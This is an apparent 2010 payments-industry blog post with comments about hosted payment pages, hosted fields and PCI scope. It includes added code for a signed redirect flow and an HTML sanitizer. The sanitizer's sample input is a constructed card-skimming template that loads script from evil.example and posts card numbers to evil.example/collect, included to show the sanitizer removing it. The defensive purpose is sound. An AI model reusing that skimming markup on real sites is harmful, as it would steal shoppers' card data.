Hosted Payment Pages and Fields

by Allen Weinberg on March 31, 2010

in Allen Weinberg, ECommerce, Ecommerce Payments, Hosted Payments

Allen Weinberg - Glenbrook Partners

As a volunteer at several non-profits, I have, of course, jumped or gotten pulled into those organizations’ payment issues. Accepting donations over the Internet is increasingly important, and there is a staggering array of specialized service providers that offer turnkey payment acceptance.

Over the past year, though, we at Glenbrook have noticed more and more traditional ecommerce merchants choosing to reduce the scope of their PCI DSS compliance efforts by using “hosted payment pages” and their close cousin, hosted payment fields. And we’re not talking about just mom-and-pop businesses: we’re hearing about merchants doing hundreds of millions of dollars in volume (even in the billion-dollar range) seriously investigating this approach.

If you’re not familiar with hosted payment pages (HPP) and hosted payment fields, the idea is to redirect the customer to a separate, secure page to enter their sensitive payment data (the card number, expiration date and card verification number). That page, or pages, have the same look and feel as the merchant’s own website but are hosted by a trusted third party, so the merchant’s systems never receive the card data; that is what reduces the merchant’s PCI DSS scope.

Hosted payment fields are an interesting variant whereby the payment page is still hosted by the merchant, but the actual field where the consumer enters their card data is served from the third party’s domain. That often gives the merchant more control and flexibility over the checkout experience. The trade-off is that the page surrounding the field is still the merchant’s: if that page is compromised, an attacker can replace or overlay the hosted field, so the merchant’s web servers remain security-relevant even though they never see a card number.

As one might imagine, both are natural adjuncts to tokenization for card-not-present merchants, because they close the “data in flight” gap inherent in many standard tokenization solutions. In the standard model the authorization request, carrying the full PAN and other card data, still originates from the merchant’s server, and the tokenized value for storage and future use only comes back with the authorization response; the merchant’s systems therefore still handle the PAN in transit. With a hosted page or field, the card data goes from the customer’s browser directly to the provider, and the merchant receives only the token.
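To make the difference concrete, here is an added example (mine, not any provider's code) of the hand-off to a hosted payment page and the merchant's handling of the return: the merchant signs the order parameters before redirecting, the hosted page (simulated here) collects the card data, vaults it and sends back only a token, and the merchant verifies the signature, the order binding and a nonce before using the token in its authorization request. The HMAC scheme, field names, shared secret, provider URL and sample order are all assumptions.

```python
"""Signed hand-off to a hosted payment page and verified return.

Added example for this post, not any provider's API. The field names, the
shared-secret HMAC scheme, the simulated provider and the sample order are
all assumptions; real HPP products define their own message formats.
"""
import hashlib
import hmac
import secrets
from urllib.parse import parse_qsl, urlencode

SHARED_SECRET = b"hpp-shared-secret-demo"   # provisioned out of band (constructed)
VAULT = {}                                  # provider-side token -> PAN store (simulated)


def _sign(fields, secret):
    """HMAC over the percent-encoded, key-sorted fields, excluding 'sig' itself."""
    canonical = urlencode(sorted((k, v) for k, v in fields.items() if k != "sig"))
    return hmac.new(secret, canonical.encode(), hashlib.sha256).hexdigest()


# ---- merchant side -------------------------------------------------------
def build_redirect(order_id, amount_cents, currency, return_url, secret=SHARED_SECRET):
    """URL the shopper is redirected to. It binds the order and amount but
    carries no card data; the PAN is typed on the provider's page."""
    fields = {"merchant_id": "M123", "order_id": order_id, "amount": str(amount_cents),
              "currency": currency, "return_url": return_url}
    fields["sig"] = _sign(fields, secret)
    return "https://hpp.example/pay?" + urlencode(fields)


class MerchantCallback:
    """Handles the browser's return from the hosted page."""

    def __init__(self, orders, secret=SHARED_SECRET):
        self.orders = orders          # order_id -> (amount_cents, currency), merchant's own record
        self.secret = secret
        self.seen_nonces = set()      # replay protection (use a durable store in production)

    def verify_return(self, query_string):
        fields = dict(parse_qsl(query_string, keep_blank_values=True))
        if not hmac.compare_digest(fields.get("sig", ""), _sign(fields, self.secret)):
            return None, "bad signature"
        if fields.get("nonce") in self.seen_nonces:
            return None, "replayed"
        expected = self.orders.get(fields.get("order_id"))
        got = (fields.get("amount"), fields.get("currency"))
        if expected is None or (str(expected[0]), expected[1]) != got:
            return None, "order mismatch"   # amount/currency must match what the merchant signed
        if fields.get("status") != "approved":
            return None, "declined"
        self.seen_nonces.add(fields["nonce"])
        return {"order_id": fields["order_id"], "token": fields["token"],
                "last4": fields["last4"]}, "ok"


def build_auth_request(verified, amount_cents, currency):
    """Server-to-server request the merchant sends later: token only, no PAN."""
    return {"order_id": verified["order_id"], "token": verified["token"],
            "amount": amount_cents, "currency": currency}


# ---- provider side (simulated; the merchant never runs this) ---------------
def hosted_page_capture(redirect_url, pan, expiry, cvn, secret=SHARED_SECRET):
    """The hosted page receives the card data from the browser, checks the
    merchant's signature, vaults the PAN and returns a signed result URL."""
    fields = dict(parse_qsl(redirect_url.split("?", 1)[1]))
    if not hmac.compare_digest(fields.get("sig", ""), _sign(fields, secret)):
        raise ValueError("tampered redirect")
    token = "tok_" + secrets.token_hex(12)
    VAULT[token] = (pan, expiry)               # CVN is used for the auth and never stored
    result = {"order_id": fields["order_id"], "amount": fields["amount"],
              "currency": fields["currency"], "status": "approved",
              "token": token, "last4": pan[-4:], "nonce": secrets.token_hex(16)}
    result["sig"] = _sign(result, secret)
    return fields["return_url"] + "?" + urlencode(result)


def demo():
    """Run the exchange once; returns the verified result and the outcomes of
    a replayed and a tampered callback."""
    cb = MerchantCallback({"ORD-1001": (4999, "USD")})
    redirect = build_redirect("ORD-1001", 4999, "USD", "https://shop.example/return")
    callback = hosted_page_capture(redirect, "4111111111111111", "12/27", "123")  # constructed test card
    qs = callback.split("?", 1)[1]
    verified, why = cb.verify_return(qs)
    _, replay_why = cb.verify_return(qs)                                  # same callback again
    _, tamper_why = cb.verify_return(qs.replace("amount=4999", "amount=1"))
    return verified, why, replay_why, tamper_why


if __name__ == "__main__":
    print(demo())
```

The three checks on the return are the ones that matter in practice: without the signature check a shopper can forge an “approved” result, without the order and amount comparison a result signed for a cheap order can be attached to an expensive one, and without the nonce a genuine result can be replayed. Real products often use a server-to-server session call or asymmetric signatures rather than a browser-carried HMAC, but the checks are the same.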

One thing we’ve been noticing is that some of the more innovative HPP providers have been taking some of the traditional friction out of the process for merchants, specifically the often complicated and time-consuming process of updating payment pages hosted on someone else’s systems.

A few companies that have hit our radar screen, such as CRE Secure, Commerce Lab from IP Commerce, CyberSource, and Pay.On in Europe and Asia, have focused on minimizing the friction that used to be inherent when the merchant changed its payment pages. Said another way, the hosted pages stay up to date as the merchant’s site design changes.

If you are aware of other companies offering similar capabilities, I’d greatly appreciate it if you could bring them to my attention; we at Glenbrook love to stay up to date on all the great offerings out there! Also, if you have a feel for how widespread the adoption of HPP and hosted payment fields is in the US and beyond, please let me know!

9 Responses to “Hosted Payment Pages and Fields”

  1. pwb says:

    PayPal totally dropped the ball on this. It could have completely dominated hosted credit card payments and has continued to remain on the sidelines, forcing buyers through its convoluted checkout flows.

    • Allen Weinberg says:

      pwb – thanks for your interesting comment. While it is true that PayPal users are somewhat redirected, some might argue that the checkout process is still more streamlined than standard bankcard use cases: 16-digit account number, 4-digit expiration date, 3-digit CVN, billing address, shipping address, etc., versus email address/PayPal user ID and password. And from a PCI standpoint, merchants accepting PayPal transactions aren’t touching PANs and such (I didn’t mean to make this sound like a PayPal commercial — just thinking about the notion of checkout flows, users, PCI, etc.)

      Interestingly, take a look at a CRE Secure press release from 3/2/2010 re: CRE Secure being the preferred provider of HPP for merchants using PayPal Website Payments Pro and PayPal PayFlow Pro payment gateways (—march-2-2010.html)


  2. Ash says:

    I’m curious about the PCI compliance of hosted payment fields. While the merchant isn’t touching the card data, card data is still entered on a page that is controlled and managed by the merchant (so an attacker could simply modify the page content to get access to cards as they are entered and sent to the gateway).

    So while their PCI compliance requirements are reduced, I would think that there still should be a significant requirement to secure the system serving the page, when compared to a hosted payment page where the entry is completely controlled on a 3rd party system?

    • Greg McGraw says:

      Ash, you bring up an interesting question. The hosted payment service from CRE Secure, mentioned in Allen’s post, actually pulls a blank, styled page from the merchant’s site over SSL, strips it of any JavaScript, ActiveX or iframe executable code, marries it up with a secure payment form and displays it directly back to the end user’s browser, thus giving the appearance that it is coming from the merchant’s site while actually being totally ‘cloned’ and presented from a Level 1 PCI DSS data center. Result: the merchant gets to maintain ultimate ‘control’ over the content displayed to end users but never touches a credit card on their inherently insecure hosting environment. It might be worth a look. I’d like to get your comments, too.

      • Ash says:

        Greg, your approach at CRE is (from my perspective/research) the right way to do it: allow the merchant total control to brand/modify the page, serve it up off a secure server, and also allow the merchant to manage the branding themselves.

        We considered rolling out a payment fields approach, but there were so many unknowns, and in the end our QSA said we would maintain PCI compliance, but if there was ever a breach in the fields method, then there would be a lot of uncertainty around its future. In the end we went with something very similar to the CRE approach of hosted pages.

        However, all up, there has been a massive shift in large organisations looking for hosted solutions. A few years ago it would have almost been unheard of for an enterprise to use a hosted solution, but now almost every tender I work with is requiring a hosted solution to reduce the PCI compliance requirements.
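Ash’s concern about a merchant-served page and the page-cloning approach Greg describes both come down to what survives of the merchant’s markup when the provider renders it. The following is an added example (editorial, not CRE Secure’s or any vendor’s code) of the allowlist approach a provider would want for that step: rather than blacklisting script, ActiveX and iframe tags, keep only inert structural markup, styling hooks and https resource URLs, drop every attribute not explicitly allowed (so inline event handlers and `javascript:` links go too), then insert the provider’s own form at a placeholder element. The placeholder convention, the tag and attribute sets, the provider form and the hostile sample template are all constructed for the example.

```python
"""Allowlist sanitizer for a merchant-supplied checkout template.

Added example for this thread, not CRE Secure's or any vendor's code. The
model is assumed: the provider fetches the merchant's styled page over TLS,
keeps only inert markup, and injects its own card-entry form where the
merchant left a placeholder element. Tag/attribute sets and the sample
template are constructed for the example.
"""
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# What may survive: structure, text, images and external stylesheets.
ALLOWED_TAGS = {"html", "head", "title", "body", "div", "span", "p", "h1", "h2", "h3",
                "ul", "ol", "li", "a", "img", "br", "table", "thead", "tbody", "tr", "td",
                "th", "link"}
VOID_TAGS = {"br", "img", "link"}
# These are dropped together with everything inside them.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "applet", "form",
                     "noscript", "template"}
GLOBAL_ATTRS = {"class", "id", "title"}
URL_ATTRS = {("a", "href"), ("img", "src"), ("link", "href")}
PLAIN_ATTRS = {("img", "alt"), ("img", "width"), ("img", "height"), ("link", "rel"),
               ("link", "type")}
PLACEHOLDER = '<div id="payment-form"></div>'   # assumed merchant-side marker


def safe_url(value):
    """Only absolute https URLs; rejects javascript:, data:, vbscript: and relative paths."""
    return urlsplit(value.strip()).scheme.lower() == "https"


class TemplateSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []     # allowed elements currently open, for well-formed output
        self.dropping = []      # stack of DROP_WITH_CONTENT elements we are inside

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.dropping.append(tag)
            return
        if self.dropping or tag not in ALLOWED_TAGS:
            return              # unlisted tag: drop the tag itself, keep its text
        kept = []
        for name, value in attrs:
            if value is None:
                continue
            if name in GLOBAL_ATTRS or (tag, name) in PLAIN_ATTRS:
                kept.append((name, value))
            elif (tag, name) in URL_ATTRS and safe_url(value):
                kept.append((name, value))
            # everything else (on*, style, srcdoc, formaction, ...) is discarded
        attr_text = "".join(f' {n}="{html.escape(v, quote=True)}"' for n, v in kept)
        self.out.append(f"<{tag}{attr_text}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if self.dropping:
            if tag == self.dropping[-1]:
                self.dropping.pop()
            return
        if tag in self.open_tags:
            while self.open_tags:               # close back to the matching element
                closed = self.open_tags.pop()
                self.out.append(f"</{closed}>")
                if closed == tag:
                    break

    def handle_data(self, data):
        if not self.dropping:
            self.out.append(html.escape(data, quote=False))   # re-escape: charrefs were decoded

    # comments, doctype and processing instructions fall through to the no-op defaults

    def result(self):
        self.close()
        while self.open_tags:                   # close anything the template left open
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize_template(markup):
    parser = TemplateSanitizer()
    parser.feed(markup)
    return parser.result()


def compose_payment_page(merchant_template, provider_form_html):
    """Sanitize the merchant's page and put the provider's own form at the placeholder."""
    cleaned = sanitize_template(merchant_template)
    if PLACEHOLDER not in cleaned:
        raise ValueError("template has no payment-form placeholder")
    return cleaned.replace(PLACEHOLDER, provider_form_html, 1)


# Constructed hostile template: a compromised merchant site trying to skim the hosted page.
MERCHANT_TEMPLATE = """<!DOCTYPE html><html><head><title>Acme Checkout</title>
<link rel="stylesheet" href="https://shop.example/css/checkout.css">
<script src="https://cdn.evil.example/skim.js"></script>
<style>body{background:url(https://evil.example/beacon)}</style></head>
<body onload="steal()"><div class="header"><img src="https://shop.example/logo.png" alt="Acme"></div>
<p>Pay securely. <a href="javascript:alert(1)">Help</a> <a href="https://shop.example/help">Help</a></p>
<iframe src="https://evil.example/fake-form"></iframe>
<div id="payment-form"></div>
<form action="https://evil.example/collect"><input name="pan"></form>
&lt;script&gt;not code&lt;/script&gt;
</body></html>"""

PROVIDER_FORM = '<form method="post" action="https://hpp.example/submit"><input name="pan"></form>'

if __name__ == "__main__":
    print(compose_payment_page(MERCHANT_TEMPLATE, PROVIDER_FORM))
```

Two design choices are worth spelling out. Dropping attributes by default is what removes `onload=` and `javascript:` without needing to enumerate them, which a tag blocklist never does. Inline `style` attributes and `<style>` blocks are dropped as well, because CSS can carry `url()` beacons (and, in older browsers, script expressions); a production implementation would add a CSS filter so the merchant keeps its styling, and would fetch the template only over TLS with certificate validation, since the whole scheme trusts what it fetched.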

  3. Walt Conway says:

    Hosted order pages and other, related forms of outsourcing are becoming more common in even larger merchants. The advantages of taking much of the PCI burden and the convenience are primary draws. Companies need to ask themselves what business they are in. My guess is that not too many will say they are in the payment processing business. Therefore it makes sense not to devote resources to hosting and maintaining your own web payment page(s).

    As a QSA, whenever I speak of PCI, I emphasize that we need to keep in mind it has two implications for businesses. The first is that your costs have gone up: they may go up a little or a lot, but you have additional work to do. The second is that you will change the way you process payments: this is where limiting your scope and outsourcing come into play. I see more and more companies seriously considering planned, thoughtful outsourcing as a sensible way to approach PCI compliance.

  4. Allen Weinberg says:

    Many thanks for all the comments and out-of-band emails! One more thing – does anyone have any sense of how prevalent hosted payment fields are vs. hosted payment pages? Seems that hosted fields could involve less friction than hosted pages, but I just don’t have a sense of whether that’s true in practice. I know that CyberSource and Braintree provide hosted fields in the US but aren’t aware of any others….

  5. James says:

    A 3rd party HPP solution, I think, adds an additional point of failure and an additional exposure of card data unnecessarily. Please take a look at a method I’m proposing here:

    Using this method, only the payment service provider receives raw card data, and the resulting encryption can be safely passed to the merchant.

    Additionally, it will add confidence for shoppers in the transaction as the process is not hidden from them. Also this method provides an opportunity for shoppers to have more control on the authorization granted to the merchant in allowing them to set an expiration (not the expiration of the card, but expiration on the encrypted CHD.)

  6. Rich Brower says:

    Hello Allen & All!

    I am seeing a lot of interest and activity from merchants in our hosted solutions. We offer two methods: Hosting the entire checkout process or hosting only the required fields for the transaction requested. The latter method enables the merchant almost full control over the consumer experience and is the method I typically recommend.

    Merchants typically report two drivers for their adoption of a hosted solution. The first is their desire to reduce burden of Level 1-3 PCI compliance as you point out above. The second reason for adopting a hosted solution is that it can enable the merchant to build a quick checkout solution. This is especially interesting to merchants that need to build new interfaces in order to accept some of the “alternative” payments which would require different data inputs. A hosted solution can provide an efficient and standardized flow for a merchant’s IT department.
